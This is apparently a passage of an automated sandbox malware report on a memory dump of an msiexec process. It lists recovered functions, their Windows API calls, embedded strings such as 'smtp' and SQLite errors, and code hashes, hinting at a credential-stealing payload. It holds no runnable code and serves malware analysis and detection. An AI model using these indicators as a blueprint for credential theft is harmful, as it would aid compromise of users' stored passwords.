                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0044955B
                                                              • memset.MSVCRT ref: 0044956B
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                              • String ID:
                                                              • API String ID: 1189762176-0
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              APIs
                                                                • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                              • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                              • GetSysColor.USER32(00000005), ref: 004107A6
                                                              • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                              • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                              • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                              • String ID:
                                                              • API String ID: 2775283111-0
                                                              • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                              • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                              • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                              • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: winSeekFile$winTruncate1$winTruncate2
                                                              • API String ID: 885266447-2471937615
                                                              • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                              • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                              • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                              • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                              APIs
                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              APIs
                                                              • memset.MSVCRT ref: 004092C0
                                                              • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                              • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                              Strings
                                                              • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscpymemset
                                                              • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                              • API String ID: 408644273-3424043681
                                                              • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                              • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                              • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
                                                              • String ID: edit
                                                              • API String ID: 275601554-2167791130
                                                              • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                              • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                              • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$_mbscat
                                                              • String ID: 3CD
                                                              • API String ID: 3951308622-1938365332
                                                              • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                              • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                              • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: rows deleted
                                                              • API String ID: 2221118986-571615504
                                                              • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                              • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                              • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                              • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                              APIs
                                                                • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                              • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                              • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$memset
                                                              • String ID:
                                                              • API String ID: 1860491036-0
                                                              • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                              • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                              • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                              • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                              APIs
                                                              • memset.MSVCRT ref: 004048C2
                                                              • memset.MSVCRT ref: 004048D6
                                                              • memset.MSVCRT ref: 004048EA
                                                              • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                              • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                              • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                              • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                              • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                              APIs
                                                              • memset.MSVCRT ref: 0040D2C2
                                                              • memset.MSVCRT ref: 0040D2D8
                                                              • memset.MSVCRT ref: 0040D2EA
                                                              • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                              • memset.MSVCRT ref: 0040D319
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy
                                                              • String ID:
                                                              • API String ID: 368790112-0
                                                              • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                              • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                              • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                              APIs
                                                              • __allrem.LIBCMT ref: 00425850
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                              • __allrem.LIBCMT ref: 00425933
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 1992179935-0
                                                              • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                              • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                              • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                              APIs
                                                              Strings
                                                              • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                              • too many SQL variables, xrefs: 0042C6FD
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                              • API String ID: 2221118986-515162456
                                                              • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                              • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                              • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                              APIs
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                              • memset.MSVCRT ref: 004026AD
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 3503910906-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C922
                                                              • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                              • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                              • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Message$MenuPostSendStringmemset
                                                              • String ID:
                                                              • API String ID: 3798638045-0
                                                              • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                              • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                              • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT(?), ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                              • _gmtime64.MSVCRT ref: 00411437
                                                              • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                              • strftime.MSVCRT ref: 00411476
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              APIs
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                              • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                              • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
